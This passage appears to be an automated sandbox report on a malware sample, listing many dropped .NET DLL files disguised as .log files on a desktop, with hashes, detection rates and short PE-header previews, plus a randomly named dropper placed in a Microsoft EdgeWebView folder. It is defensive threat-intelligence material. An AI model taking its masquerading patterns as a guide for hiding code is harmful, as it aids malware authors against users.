                                                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\LVAfadhu.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64000
                                                                                                                          Entropy (8bit):5.857602289000348
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\LXFfeqSZ.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294912
                                                                                                                          Entropy (8bit):6.010605469502259
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                          C:\Users\user\Desktop\PLrVhZhn.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):38400
                                                                                                                          Entropy (8bit):5.699005826018714
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\ROdEDIli.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):41472
                                                                                                                          Entropy (8bit):5.6808219961645605
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\SChMoWhg.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):5.932541123129161
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                          C:\Users\user\Desktop\ScMeneug.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23552
                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\TJxnsSJM.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34816
                                                                                                                          Entropy (8bit):5.636032516496583
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                                                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\TmfudOZJ.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40448
                                                                                                                          Entropy (8bit):5.7028690200758465
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\UBOVNjiG.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):23552
                                                                                                                          Entropy (8bit):5.519109060441589
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                          MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                          SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                          SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                          SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\WudDzgUF.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):36352
                                                                                                                          Entropy (8bit):5.668291349855899
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\XOqvKXRc.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):36352
                                                                                                                          Entropy (8bit):5.668291349855899
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\XTzlBYHG.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):126976
                                                                                                                          Entropy (8bit):6.057993947082715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\aEgmRURW.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):38912
                                                                                                                          Entropy (8bit):5.679286635687991
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\akTuGdUy.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):38400
                                                                                                                          Entropy (8bit):5.699005826018714
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                                                                          MD5:87765D141228784AE91334BAE25AD743
                                                                                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\cVzKNqfr.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):85504
                                                                                                                          Entropy (8bit):5.8769270258874755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                                          C:\Users\user\Desktop\ceWKxdyo.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\r6cRyCpdfS.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):33792
                                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\dQqVXqpO.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):33792
                                                                                                                          Entropy (8bit):5.541771649974822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                          C:\Users\user\Desktop\dzjCIUvL.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):33280
                                                                                                                          Entropy (8bit):5.634433516692816
                                                                                                                          Encrypted:false
